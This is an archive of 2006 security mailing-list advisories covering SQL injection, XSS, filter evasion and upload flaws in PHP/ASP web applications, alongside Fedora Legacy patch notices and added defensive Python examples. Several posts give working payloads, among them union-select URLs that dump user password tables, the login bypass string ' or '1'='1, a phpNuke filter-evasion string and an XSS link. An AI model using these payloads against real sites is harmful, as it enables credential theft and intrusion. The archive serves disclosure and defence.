SQL Injection in DCI-Taskeen

2006-02-25 Thread xx_hack_xx_2004
Hello
Vulnerable: DCI-Taskeen  v1.03

http://www.dci-designs.com
 

Exploit :
http://example.com/basket.php?action=addex&id=[SQL]

http://example.com/basket.php?action=[SQL]

http://example.com/basket.php?action=addr&id=[SQL]

http://example.com/cat.php?do=cat&page=1&id=[SQL]


http://example/cat.php?do=cat&page=[SQL]

Discovery by Linux_Drox

http://www.lezr.com

Best Regards


PwsPHP Injection SQL on Index.php

2006-02-25 Thread papipsycho
Summary

Software: Pwsphp CMS
Software's Web Site: http://www.pwsphp.com/
Versions: ALL
Type: Injection SQL
Class: Remote
Status: Unpatched. No reply from developer(s)
Exploit: Available
Solution: Not Available
Discovered by: papipsycho
SITE :  (papipsycho.com & WOrlddefacers.de)

--Description--

Vulnerable Script: index.php
Log in to your account, execute the exploit, edit your cookie to change the
password and the login, then reload & enjoy.

--Exploit--

http://example.com/index.php?mod=sondages&do=results&id=1%20union%20select%20id,0,0,pseudo,pass,pseudo,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20%60users%60%20/*

--Solution--
No Patch available.
--Credit--
Discovered by: papipsycho
SITE :  (papipsycho.com & WOrlddefacers.de)


[waraxe-2006-SA#047] - Evading sql-injection filters in phpNuke 7.8

2006-02-25 Thread come2waraxe


[waraxe-2006-SA#047]

[ Evading sql-injection filters in phpNuke 7.8 ]


Author: Janek Vind "waraxe"
Date: 25. February 2006
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-47.html


Target software description:


phpNuke 7.8

Homepage: http://phpnuke.org/


What is phpNuke?

PHP-Nuke is a news automated system specially designed to be used in Intranets
and Internet. The Administrator has total control of his web site, registered
users, and he will have in the hand a powerful assembly of tools to maintain an
active and 100% interactive web site using databases.


Vulnerabilities:


phpNuke is known to be exploitable by many sql injection variations. This is
due to very poor coding quality and no-security-in-mind-at-all programming
style. And instead of rewriting phpNuke from scratch, there are many filters,
patches, code improvements and so on, directed to "curing" specific security
holes. This particular advisory will address weaknesses in anti-sql-injection
filters, used in phpNuke 7.8 version.


Details


So, what can we see in "mainfile.php", line ~20:

[ from source code ]--

//Union Tap
//Copyright Zhen-Xjell 2004 http://nukecops.com
//Beta 3 Code to prevent UNION SQL Injections
unset($matches);
unset($loc);
if (preg_match("/([OdWo5NIbpuU4V2iJT0n]{5}) /",
               rawurldecode($loc=$_SERVER["QUERY_STRING"]), $matches)) {
    die();
}

$queryString = strtolower($_SERVER['QUERY_STRING']);
if (stripos_clone($queryString,'%20union%20') OR stripos_clone($queryString,'/*')
    OR stripos_clone($queryString,'*/union/*') OR stripos_clone($queryString,'c2nyaxb0')) {
    header("Location: index.php");
    die();
}
[ /from source code ]-

Two different filters can be spotted: one of them stops script execution, the
second one redirects to the index page.
So let's start with the experimenting part.

Test #1:

http://localhost/nuke78/?kala=p0hh%20UNION%20ALL%20SELECT%201,2,3,4,5%20FROM%20nuke_authors/*

... and we get caught by the first filter (we get only a blank page).


Ok, let's modify our attack string.

Test #2:

http://localhost/nuke78/?kala=p0hh+UNION+ALL+SELECT+1,2,3,pwd,5+FROM+nuke_authors/*

... and the second filter is about kicking our a$$ (we got redirected to index).


Hmmm, how about this one ...

Test #3:

http://localhost/nuke78/?kala=p0hh+UNION+ALL+SELECT+1,2,3,pwd,5+FROM+nuke_authors/%2a


Yeah - we got through :)


And now let's be fair to the nuke patch releasers and try this working
string against PATCHED phpNuke 7.8.

Details:

patch file -  "78patched3dot2.zip"
version 3.2
Download URL - 
http://www.nukeresources.com/downloadview-details-1037-Nuke_7.8_Patched.html

Test#4:

http://localhost/nuke78p/?kala=p0hh+UNION+ALL+SELECT+1,2,3,pwd,5+FROM+nuke_authors/%2a


and WE GET CAUGHT with message "Illegal Operation" ...

Oh my ...

What we can see in patched "mainfile.php":

[ from source code ]--

// Additional security (Union, CLike, XSS)
if(!file_exists('includes/nukesentinel.php')) {
  //Union Tap
  //Copyright Zhen-Xjell 2004 http://nukecops.com
  //Beta 3 Code to prevent UNION SQL Injections
  unset($matches);
  unset($loc);
  if(isset($_SERVER['QUERY_STRING'])) {
    if (preg_match("/([OdWo5NIbpuU4V2iJT0n]{5}) /",
                   rawurldecode($loc=$_SERVER['QUERY_STRING']), $matches)) {
      die('Illegal Operation');
    }
  }
  if((!is_admin($admin)) AND (isset($_SERVER['QUERY_STRING']))
     AND (!stristr($_SERVER['QUERY_STRING'], "ad_click"))) {
    $queryString = $_SERVER['QUERY_STRING'];
    if ((stristr($queryString,'%20union%20')) OR (stristr($queryString,'/*'))
        OR (stristr($queryString,'*/union/*')) OR (stristr($queryString,'c2nyaxb0')) OR
        (stristr($queryString,'+union+')) OR (stristr($queryString,'http://')) OR
        ((stristr($queryString,'cmd=')) AND (!stristr($queryString,'&cmd'))) OR
        ((stristr($queryString,'exec')) AND (!stristr($queryString,'execu'))) OR
        (stristr($queryString,'concat'))) {
      die('Illegal Operation');
    }
  }
}
[ /from source code ]-

This code seems very restrictive, but ... wait a minute ...

"AND (!stristr($_SERVER['QUERY_STRING']
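
The following Python script is an added illustration, not waraxe's or phpNuke's code: it models the two stock phpNuke 7.8 filters quoted above and shows why Test #3 slips through. The first filter runs its regex over the rawurldecode()d query string but requires a literal space, so a '+'-separated payload never matches; the second filter looks for '/*' in the raw, undecoded string, so '/%2a' is never seen as a comment opener. The canonical_blocks() function applies the same signatures after the input has been decoded to a fixed point, which makes all three test strings look identical to the check. The test strings and function names are constructed for this example.

```python
import re
from urllib.parse import unquote, unquote_plus

# Constructed inputs: the query strings behind Test #1, #2 and #3 in the post above.
TEST1 = "kala=p0hh%20UNION%20ALL%20SELECT%201,2,3,4,5%20FROM%20nuke_authors/*"
TEST2 = "kala=p0hh+UNION+ALL+SELECT+1,2,3,pwd,5+FROM+nuke_authors/*"
TEST3 = "kala=p0hh+UNION+ALL+SELECT+1,2,3,pwd,5+FROM+nuke_authors/%2a"

# Same pattern as the "Union Tap" preg_match in mainfile.php: five characters
# from the set followed by a literal space. The set contains both cases of
# U, N, I and O, so "UNION " and "union " both match.
UNION_TAP_RE = re.compile(r"([OdWo5NIbpuU4V2iJT0n]{5}) ")

# Substrings the second filter looks for in the lowercased raw query string.
RAW_NEEDLES = ("%20union%20", "/*", "*/union/*", "c2nyaxb0")


def filter_one(qs: str) -> bool:
    """Model of filter 1: regex over rawurldecode()d input. Python's unquote(),
    like PHP's rawurldecode(), leaves '+' alone, so a '+'-separated payload
    never contains the space the pattern requires."""
    return UNION_TAP_RE.search(unquote(qs)) is not None


def filter_two(qs: str) -> bool:
    """Model of filter 2: substring checks on the raw query string. Nothing is
    decoded here, so '%2a' is not recognised as '*'."""
    lowered = qs.lower()
    return any(needle in lowered for needle in RAW_NEEDLES)


def nuke78_blocks(qs: str) -> bool:
    """True if either stock phpNuke 7.8 filter would stop the request."""
    return filter_one(qs) or filter_two(qs)


def canonicalize(qs: str, max_rounds: int = 3) -> str:
    """Decode '+' and %XX repeatedly until the value stops changing, so that
    single- and double-encoded forms collapse to the same text, then lowercase."""
    current = qs
    for _ in range(max_rounds):
        decoded = unquote_plus(current)
        if decoded == current:
            break
        current = decoded
    return current.lower()


# After canonicalization the signatures are matched in their decoded form.
DECODED_NEEDLES = (" union ", "/*", "c2nyaxb0")


def canonical_blocks(qs: str) -> bool:
    """Same signatures, applied to the canonical form of the input, so the
    three test strings are treated identically regardless of encoding."""
    text = canonicalize(qs)
    return UNION_TAP_RE.search(text) is not None or any(n in text for n in DECODED_NEEDLES)


if __name__ == "__main__":
    for name, qs in (("Test #1", TEST1), ("Test #2", TEST2), ("Test #3", TEST3)):
        print(f"{name}: stock filters block={nuke78_blocks(qs)}  "
              f"canonical check blocks={canonical_blocks(qs)}")
```

Decoding to a fixed point before matching closes the specific gap the post demonstrates, but it is still a blacklist: the durable fix for the underlying bug is to bind query parameters (prepared statements) and validate each parameter against its expected type, so that encoding tricks in the query string never reach SQL syntax at all.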

ArGoSoft FTP server remote heap overflow

2006-02-25 Thread Jerome Athias
-- Title:
ArGoSoft FTP server remote heap overflow

-- Affected Products:
ArGoSoft FTP server 1.4.3.5 (current) and prior

-- Affected Vendor:
ArGoSoft - http://www.argosoft.com

-- Impact:
DoS, Arbitrary Code Execution

-- Where:
From remote

-- Type:
Heap Overflow

-- Vulnerability Details:
A remote attacker with valid credentials is able to trigger a heap
overwrite in ArGoSoft FTP server.
The bug occurs by providing a long argument to the DELE command. This
vulnerability can allow remote attackers to execute arbitrary code or
launch a denial of service attack.

-- Credit:
SecurInfos
https://www.securinfos.info/english/



[FLSA-2006:176731] Updated perl packages fix security issue

2006-02-25 Thread Marc Deslauriers
-
   Fedora Legacy Update Advisory

Synopsis:  Updated perl packages fix security issue
Advisory ID:   FLSA:176731
Issue date:2006-02-25
Product:   Red Hat Linux, Fedora Core
Keywords:  Bugfix
CVE Names: CVE-2005-3962
-


-
1. Topic:

Updated perl packages that fix a security flaw are now available.

Perl is a high-level programming language commonly used for system
administration utilities and Web programming.

2. Relevant releases/architectures:

Red Hat Linux 9 - i386
Fedora Core 1 - i386
Fedora Core 2 - i386

3. Problem description:

An integer overflow bug was found in Perl's format string processor.  It
is possible for an attacker to cause perl to crash or execute arbitrary
code if the attacker is able to process a malicious format string.  This
issue is only exploitable through a script which passes arbitrary
untrusted strings to the format string processor.  The Common
Vulnerabilities and Exposures project assigned the name CVE-2005-3962 to
this issue.


Note that this vulnerability does not affect perl packages in Red Hat
Linux 7.3.

Users of perl are advised to upgrade to these packages which contain a
backported patch and are not vulnerable to this issue.

4. Solution:

Before applying this update, make sure all previously released errata
relevant to your system have been applied.

To update all RPMs for your particular architecture, run:

rpm -Fvh [filenames]

where [filenames] is a list of the RPMs you wish to upgrade.  Only those
RPMs which are currently installed will be updated.  Those RPMs which
are not installed but included in the list will not be updated.  Note
that you can also use wildcards (*.rpm) if your current directory *only*
contains the desired RPMs.

Please note that this update is also available via yum and apt.  Many
people find this an easier way to apply updates.  To use yum issue:

yum update

or to use apt:

apt-get update; apt-get upgrade

This will start an interactive process that will result in the
appropriate RPMs being upgraded on your system.  This assumes that you
have yum or apt-get configured for obtaining Fedora Legacy content.
Please visit http://www.fedoralegacy.org/docs for directions on how to
configure yum and apt-get.

5. Bug IDs fixed:

https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=176731

6. RPMs required:

Red Hat Linux 9:

SRPM:
http://download.fedoralegacy.org/redhat/9/updates/SRPMS/perl-5.8.0-90.0.13.legacy.src.rpm

i386:
http://download.fedoralegacy.org/redhat/9/updates/i386/perl-5.8.0-90.0.13.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/perl-CGI-2.81-90.0.13.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/perl-CPAN-1.61-90.0.13.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/perl-DB_File-1.804-90.0.13.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/perl-suidperl-5.8.0-90.0.13.legacy.i386.rpm

Fedora Core 1:

SRPM:
http://download.fedoralegacy.org/fedora/1/updates/SRPMS/perl-5.8.3-17.5.legacy.src.rpm

i386:
http://download.fedoralegacy.org/fedora/1/updates/i386/perl-5.8.3-17.5.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/perl-suidperl-5.8.3-17.5.legacy.i386.rpm

Fedora Core 2:

SRPM:
http://download.fedoralegacy.org/fedora/2/updates/SRPMS/perl-5.8.3-19.5.legacy.src.rpm

i386:
http://download.fedoralegacy.org/fedora/2/updates/i386/perl-5.8.3-19.5.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/2/updates/i386/perl-suidperl-5.8.3-19.5.legacy.i386.rpm


7. Verification:

SHA1 sum Package Name
-

4d2401a09f2cc0b126df88659bd9e259a528146d
redhat/9/updates/i386/perl-5.8.0-90.0.13.legacy.i386.rpm
3b5448a2a8d8241a85c4c54ad5d5deb4b9d466d4
redhat/9/updates/i386/perl-CGI-2.81-90.0.13.legacy.i386.rpm
40a05fcf3a7d128e7fa79b00022d54d0542bd3af
redhat/9/updates/i386/perl-CPAN-1.61-90.0.13.legacy.i386.rpm
5444ce68de7e8f0b1b051a15a1658c7d497be61b
redhat/9/updates/i386/perl-DB_File-1.804-90.0.13.legacy.i386.rpm
76ff3cdbe78a2e7c92c1f95760906fd396f974bf
redhat/9/updates/i386/perl-suidperl-5.8.0-90.0.13.legacy.i386.rpm
62fbcae6dd839fd18aabcf5c9fcc6babfd844d94
redhat/9/updates/SRPMS/perl-5.8.0-90.0.13.legacy.src.rpm

3267a9d83ac3cadcfa650b1625cf5c458adb5540
fedora/1/updates/i386/perl-5.8.3-17.5.legacy.i386.rpm
2445d66c7ced8bccc7d875a21404216a0cd5cdb6
fedora/1/updates/i386/perl-suidperl-5.8.3-17.5.legacy.i386.rpm
297a649694e03e67b13cfbac7ae8211554cea44b
fedora/1/updates/SRPMS/perl-5.8.3-17.5.legacy.src.rpm

772f9571df3a0eab7749bb0d162311f4cd539879
fedora/2/updates/i386/perl-5.8.3-19.5.legacy.i386.rpm
83cf2b36b48760eb1f99a042214eead7a9650d38
fedora/2/updates/i386/perl-suidperl-5.8.3-19.5.le

[FLSA-2006:158543] Updated gaim package fixes security issues

2006-02-25 Thread Marc Deslauriers
-
   Fedora Legacy Update Advisory

Synopsis:  Updated gaim package fixes security issues
Advisory ID:   FLSA:158543
Issue date:2006-02-25
Products:  Red Hat Linux, Fedora Core
Keywords:  Bugfix
CVE Names: CVE-2005-0208 CVE-2005-0473 CVE-2005-0472 CVE-2005-0965
   CVE-2005-0966 CVE-2005-0967 CVE-2005-1261 CVE-2005-1262
   CVE-2005-2103 CVE-2005-2102 CVE-2005-2370 CVE-2005-1269
   CVE-2005-1934
-


-
1. Topic:

An updated gaim package that fixes various security issues as well as a
number of bugs is now available.

The Gaim application is a multi-protocol instant messaging client.

2. Relevant releases/architectures:

Red Hat Linux 7.3 - i386
Red Hat Linux 9 - i386
Fedora Core 1 - i386
Fedora Core 2 - i386

3. Problem description:

Two HTML parsing bugs were discovered in Gaim. It is possible that a
remote attacker could send a specially crafted message to a Gaim client,
causing it to crash. The Common Vulnerabilities and Exposures project
(cve.mitre.org) has assigned the names CVE-2005-0208 and CVE-2005-0473
to these issues.

A bug in the way Gaim processes SNAC packets was discovered. It is
possible that a remote attacker could send a specially crafted SNAC
packet to a Gaim client, causing the client to stop responding. The
Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CVE-2005-0472 to this issue.

A buffer overflow bug was found in the way gaim escapes HTML. It is
possible that a remote attacker could send a specially crafted message
to a Gaim client, causing it to crash. The Common Vulnerabilities and
Exposures project (cve.mitre.org) has assigned the name CVE-2005-0965
to this issue.

A bug was found in several of gaim's IRC processing functions. These
functions fail to properly remove various markup tags within an IRC
message. It is possible that a remote attacker could send a specially
crafted message to a Gaim client connected to an IRC server, causing it
to crash. The Common Vulnerabilities and Exposures project
(cve.mitre.org) has assigned the name CVE-2005-0966 to this issue.

A bug was found in gaim's Jabber message parser. It is possible for a
remote Jabber user to send a specially crafted message to a Gaim client,
causing it to crash. The Common Vulnerabilities and Exposures project
(cve.mitre.org) has assigned the name CVE-2005-0967 to this issue.

A stack based buffer overflow bug was found in the way gaim processes a
message containing a URL. A remote attacker could send a carefully
crafted message resulting in the execution of arbitrary code on a
victim's machine. The Common Vulnerabilities and Exposures project
(cve.mitre.org) has assigned the name CVE-2005-1261 to this issue.

A bug was found in the way gaim handles malformed MSN messages. A remote
attacker could send a carefully crafted MSN message causing gaim to
crash. The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2005-1262 to this issue.

A heap based buffer overflow issue was discovered in the way Gaim
processes away messages. A remote attacker could send a specially
crafted away message to a Gaim user logged into AIM or ICQ that could
result in arbitrary code execution. The Common Vulnerabilities and
Exposures project (cve.mitre.org) has assigned the name CVE-2005-2103 to
this issue.

Daniel Atallah discovered a denial of service issue in Gaim. A remote
attacker could attempt to upload a file with a specially crafted name to
a user logged into AIM or ICQ, causing Gaim to crash. The Common
Vulnerabilities and Exposures project (cve.mitre.org) has assigned the
name CVE-2005-2102 to this issue.

A denial of service bug was found in Gaim's Gadu Gadu protocol handler.
A remote attacker could send a specially crafted message to a Gaim user
logged into Gadu Gadu, causing Gaim to crash. Please note that this
issue only affects PPC and IBM S/390 systems running Gaim. The Common
Vulnerabilities and Exposures project (cve.mitre.org) has assigned the
name CVE-2005-2370 to this issue.

Jacopo Ottaviani discovered a bug in the way Gaim handles Yahoo!
Messenger file transfers. It is possible for a malicious user to send a
specially crafted file transfer request that causes Gaim to crash. The
Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CVE-2005-1269 to this issue.

Additionally, Hugo de Bokkenrijder discovered a bug in the way Gaim
parses MSN Messenger messages. It is possible for a malicious user to
send a specially crafted MSN Messenger message that causes Gaim to
crash. The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2005-1934 to this issue.

Additionally, various client crashes, m

[FLSA-2006:138098] Updated nfs-utils package fixes security issues

2006-02-25 Thread Marc Deslauriers
-
   Fedora Legacy Update Advisory

Synopsis:  Updated nfs-utils package fixes security issues
Advisory ID:   FLSA:138098
Issue date:2006-02-25
Product:   Red Hat Linux, Fedora Core
Keywords:  Bugfix
CVE Names: CVE-2004-0946 CVE-2004-1014
-


-
1. Topic:

An updated nfs-utils package that fixes security issues is now
available.

The nfs-utils package provides a daemon for the kernel NFS server and
related tools, providing a much higher level of performance than the
traditional Linux NFS server used by most users.

2. Relevant releases/architectures:

Red Hat Linux 7.3 - i386
Red Hat Linux 9 - i386
Fedora Core 1 - i386
Fedora Core 2 - i386

3. Problem description:

Arjan van de Ven discovered a buffer overflow in rquotad. On 64-bit
architectures, an improper integer conversion can lead to a buffer
overflow. An attacker with access to an NFS share could send a specially
crafted request which could lead to the execution of arbitrary code. The
Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CVE-2004-0946 to this issue.

In addition, the Fedora Core 2 update fixes the following issue:

SGI reported that the statd daemon did not properly handle the SIGPIPE
signal. A misconfigured or malicious peer could cause statd to crash,
leading to a denial of service. The Common Vulnerabilities and Exposures
project (cve.mitre.org) has assigned the name CVE-2004-1014 to this
issue.

All users of nfs-utils should upgrade to this updated package, which
resolves these issues.

4. Solution:

Before applying this update, make sure all previously released errata
relevant to your system have been applied.

To update all RPMs for your particular architecture, run:

rpm -Fvh [filenames]

where [filenames] is a list of the RPMs you wish to upgrade.  Only those
RPMs which are currently installed will be updated.  Those RPMs which
are not installed but included in the list will not be updated.  Note
that you can also use wildcards (*.rpm) if your current directory *only*
contains the desired RPMs.

Please note that this update is also available via yum and apt.  Many
people find this an easier way to apply updates.  To use yum issue:

yum update

or to use apt:

apt-get update; apt-get upgrade

This will start an interactive process that will result in the
appropriate RPMs being upgraded on your system.  This assumes that you
have yum or apt-get configured for obtaining Fedora Legacy content.
Please visit http://www.fedoralegacy.org/docs for directions on how to
configure yum and apt-get.

5. Bug IDs fixed:

https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=138098

6. RPMs required:

Red Hat Linux 7.3:
SRPM:
http://download.fedoralegacy.org/redhat/7.3/updates/SRPMS/nfs-utils-0.3.3-6.73.2.legacy.src.rpm

i386:
http://download.fedoralegacy.org/redhat/7.3/updates/i386/nfs-utils-0.3.3-6.73.2.legacy.i386.rpm

Red Hat Linux 9:

SRPM:
http://download.fedoralegacy.org/redhat/9/updates/SRPMS/nfs-utils-1.0.1-3.9.2.legacy.src.rpm

i386:
http://download.fedoralegacy.org/redhat/9/updates/i386/nfs-utils-1.0.1-3.9.2.legacy.i386.rpm

Fedora Core 1:

SRPM:
http://download.fedoralegacy.org/fedora/1/updates/SRPMS/nfs-utils-1.0.6-1.2.legacy.src.rpm

i386:
http://download.fedoralegacy.org/fedora/1/updates/i386/nfs-utils-1.0.6-1.2.legacy.i386.rpm

Fedora Core 2:

SRPM:
http://download.fedoralegacy.org/fedora/2/updates/SRPMS/nfs-utils-1.0.6-22.2.legacy.src.rpm

i386:
http://download.fedoralegacy.org/fedora/2/updates/i386/nfs-utils-1.0.6-22.2.legacy.i386.rpm

7. Verification:

SHA1 sum Package Name
-

fc563f70e9f2b5eeafb51b969689185ef504
redhat/7.3/updates/i386/nfs-utils-0.3.3-6.73.2.legacy.i386.rpm
79dd718df766c23fc8ab4880a0e1557ca990c181
redhat/7.3/updates/SRPMS/nfs-utils-0.3.3-6.73.2.legacy.src.rpm
45c4f3a310d3090271f0d0798cae1e3148ab8299
redhat/9/updates/i386/nfs-utils-1.0.1-3.9.2.legacy.i386.rpm
bf009c4fe075b7105316084c6ca577f15c5bdb52
redhat/9/updates/SRPMS/nfs-utils-1.0.1-3.9.2.legacy.src.rpm
1c96ae93420683ad79b675b205ecb5d6ddb61ef4
fedora/1/updates/i386/nfs-utils-1.0.6-1.2.legacy.i386.rpm
6d4ee9e13e8b3bf1278d59b48ccb0c48f7645f7f
fedora/1/updates/SRPMS/nfs-utils-1.0.6-1.2.legacy.src.rpm
2063735e17273d7967c8fa1f3649ab86921c910e
fedora/2/updates/i386/nfs-utils-1.0.6-22.2.legacy.i386.rpm
dc3207c089204dd1c47653dc4918fe45b81a8654
fedora/2/updates/SRPMS/nfs-utils-1.0.6-22.2.legacy.src.rpm

These packages are GPG signed by Fedora Legacy for security.  Our key is
available from http://www.fedoralegacy.org/about/security.php

You can verify each package with the following command:

rpm --checksig -v 

If you only wish to verify that each package has not been corr
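
The verification sections of the two Fedora Legacy advisories above each list a SHA1 sum per package. The following Python script is an added example, not Fedora Legacy tooling: it parses a listing in that format (including the wrapped form seen in this archive copy, where the hash and the path sit on consecutive lines) and checks local downloads against it. The files and the listing it verifies are constructed in a temporary directory; the paths and hashes are not those of the advisories. It only automates the checksum table; the GPG signature check with rpm --checksig that the advisory recommends is the stronger verification and is not replaced by this.

```python
import hashlib
import hmac
import os
import re
import tempfile

HEX40 = re.compile(r"\A[0-9a-f]{40}\Z")


def parse_listing(text: str) -> dict:
    """Parse a 'SHA1 sum  Package Name' section into {relative_path: sha1}.
    Accepts both 'hash  path' on one line and the wrapped form (hash on one
    line, path on the next). Lines that are neither are ignored."""
    entries = {}
    pending = None
    for line in text.splitlines():
        tokens = line.split()
        if len(tokens) == 2 and HEX40.match(tokens[0]):
            entries[tokens[1]] = tokens[0]
            pending = None
        elif len(tokens) == 1 and HEX40.match(tokens[0]):
            pending = tokens[0]
        elif len(tokens) == 1 and pending is not None:
            entries[tokens[0]] = pending
            pending = None
        else:
            pending = None
    return entries


def sha1_file(path: str) -> str:
    """Stream the file so large RPMs are not read into memory at once."""
    h = hashlib.sha1()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def verify(entries: dict, root: str) -> dict:
    """Compare each listed file under root with its advisory hash.
    Returns {relative_path: 'ok' | 'MISMATCH' | 'missing'}."""
    results = {}
    for rel, expected in entries.items():
        full = os.path.join(root, rel)
        if not os.path.isfile(full):
            results[rel] = "missing"
        elif hmac.compare_digest(sha1_file(full), expected):
            results[rel] = "ok"
        else:
            results[rel] = "MISMATCH"
    return results


def build_fixture():
    """Constructed download directory plus a listing in the advisory's format:
    one matching file, one altered file and one file that was never fetched."""
    root = tempfile.mkdtemp(prefix="flsa_verify_")
    pkgdir = os.path.join(root, "redhat", "9", "updates", "i386")
    os.makedirs(pkgdir)
    with open(os.path.join(pkgdir, "good.rpm"), "wb") as f:
        f.write(b"constructed rpm payload A")
    with open(os.path.join(pkgdir, "tampered.rpm"), "wb") as f:
        f.write(b"constructed rpm payload B, modified after download")
    listing = "\n".join([
        "SHA1 sum Package Name",
        "-",
        sha1_file(os.path.join(pkgdir, "good.rpm")),          # wrapped form
        "redhat/9/updates/i386/good.rpm",
        hashlib.sha1(b"constructed rpm payload B").hexdigest()  # one-line form
        + "  redhat/9/updates/i386/tampered.rpm",
        "0" * 40 + "  redhat/9/updates/i386/missing.rpm",
    ])
    return root, listing


if __name__ == "__main__":
    root, listing = build_fixture()
    for rel, status in verify(parse_listing(listing), root).items():
        print(f"{status:9} {rel}")
```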

NSA Group Security Advisory NSAG-№202-25.02.2006 Vulnerability WEBSITE GENERATOR 3.3

2006-02-25 Thread NSA Group
Advisory:
NSAG-№202-25.02.2006

Research:
NSA Group [Russian company on Audit of safety & Network security]

Site of Research:
http://www.nsag.ru or http://www.nsag.org

Product:
WEBSITE GENERATOR 3.3


Site of manufacturer:
http://freehostshop.com

The status: 
19/11/2005 - Publication is postponed.
19/11/2005 - Manufacturer is not notified (there is no communication).
17/02/2006 - Publication of vulnerability.

Original Advisory:
http://www.nsag.ru/vuln/894.html

Risk: 
Hide

Description: 
The removed user can upload a PHP script from another server and execute
custom PHP code on the webserver.


Exploit: 
Method GET:
http://example.com/files/myforms/process3.php?formname=attack.php%00*name[0]=
Link:
http://example.com/files/myforms/forms/attack.php

More information:
http://www.nsag.ru/vuln/894.html

++


www.nsag.ru 
«Nemesis» © 2006 
 
Nemesis Security Audit Group © 2006.




Advisory: eZ publish <= 3.7.3 (imagecatalogue module) XSS vulnerability

2006-02-25 Thread nukedx
--Security Report--
Advisory: eZ publish <= 3.7.3 (imagecatalogue module) XSS vulnerability
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 25/02/06 01:43 PM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx (at) nukedx (dot) com
Web: http://www.nukedx.com
}
---
Vendor: eZ systems  (http://www.ez.no)
Version: 3.7.3 and prior versions must be affected.
About: Via this method a remote attacker can make malicious links for clicking, and
when the victim clicks these links the victim's browser would be injected with XSS.
Level: Harmless
---
How&Example:
The ReferrerURL variable is not sanitized properly.
GET -> http://[site]/[ezdir]/imagecatalogue/imageview/475/?RefererURL=";>[XSS]
EXAMPLE ->
http://[site]/[ezdir]/imagecatalogue/imageview/475/?RefererURL=";>alert('X');http://www.nukedx.com/?viewdoc=16



Advisory: Pentacle In-Out Board <= 6.03 (newsdetailsview.asp newsid) Remote SQL Injection Vulnerability

2006-02-25 Thread nukedx
--Security Report--
Advisory: Pentacle In-Out Board <= 6.03 (newsdetailsview.asp newsid) Remote SQL
Injection Vulnerability
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 25/02/06 06:08 AM
---
Contacts:{
ICQ: 10072
MSN/Email: [EMAIL PROTECTED]
Web: http://www.nukedx.com
}
---
Vendor: G2SOFT (www.g2soft.net)
Version: 6.03 and prior versions must be affected.
About: Via this method a remote attacker can inject an arbitrary SQL query into
newsdetailsview.asp.
Level: Critical
---
How&Example:
GET -> http://[site]/[ptdir]/newsdetailsview.asp?newsid=11%20[SQLCode]
EXAMPLE ->
http://[site]/[ptdir]/newsdetailsview.asp?newsid=11%20union%20select%200,userpassword,0,username,0,0,0,0
%20from%20pt_users%20where%20userid=1%20and%20useradmin=yes
With this example a remote attacker could get the admin's username and password.
--
Timeline:
* 25/02/2006: Vulnerability found.
* 25/02/2006: Contacted the vendor and waiting for a reply.
--
Exploit:
http://www.nukedx.com/?getxpl=14
--
Original advisory: http://www.nukedx.com/?viewdoc=14



Advisory: Pentacle In-Out Board <= 6.03 (login.asp) Authentication Bypass Vulnerability

2006-02-25 Thread nukedx
--Security Report--
Advisory: Pentacle In-Out Board <= 6.03 (login.asp) Authentication Bypass
Vulnerability
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 25/02/06 05:56 AM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx (at) nukedx (dot) com
Web: http://www.nukedx.com
}
---
Vendor: G2SOFT (www.g2soft.net)
Version: 6.03 and prior versions must be affected.
About: Via this method a remote attacker can bypass login.asp and log in as admin.
Level: Critical
---
How:
The SQL query in line 31 of login.asp which checks the username and password is
not sanitized properly.
POST -> http://[site]/[ptdir]/login.asp?username=any&password=' or '1'='1
--
Timeline:
* 25/02/2006: Vulnerability found.
* 25/02/2006: Contacted the vendor and waiting for a reply.
--
Exploit:
http://www.nukedx.com/?getxpl=13
--
Original advisory: http://www.nukedx.com/?viewdoc=13
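
The two Pentacle In-Out Board advisories above describe the same root cause from two angles: a login check built by string concatenation (login.asp) and an unvalidated integer parameter (newsdetailsview.asp newsid). The Python/sqlite3 script below is an added example, not G2SOFT's code: it reproduces the concatenated query shape the advisory implies (an assumption, since only line 31 is named), shows the tautology password defeating it, and puts the parameterised query and an allow-list check for newsid beside it. The pt_users rows are constructed.

```python
import re
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the pt_users table named in the advisory."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE pt_users (userid INTEGER, username TEXT, userpassword TEXT, useradmin TEXT)"
    )
    conn.execute("INSERT INTO pt_users VALUES (1, 'admin', 'constructed-secret', 'yes')")
    conn.execute("INSERT INTO pt_users VALUES (2, 'alice', 'constructed-pw', 'no')")
    conn.commit()
    return conn


def login_concat(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Assumed shape of the login.asp check: user input pasted into the SQL text.
    A password of  ' or '1'='1  turns the WHERE clause into a tautology, so a row
    is returned for any username and the login succeeds."""
    sql = ("SELECT userid FROM pt_users WHERE username='" + username
           + "' AND userpassword='" + password + "'")
    return conn.execute(sql).fetchone() is not None


def login_param(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Fixed form: bound parameters keep the input as data, never as SQL syntax,
    so the same password string is compared literally and matches nothing."""
    sql = "SELECT userid FROM pt_users WHERE username=? AND userpassword=?"
    return conn.execute(sql, (username, password)).fetchone() is not None


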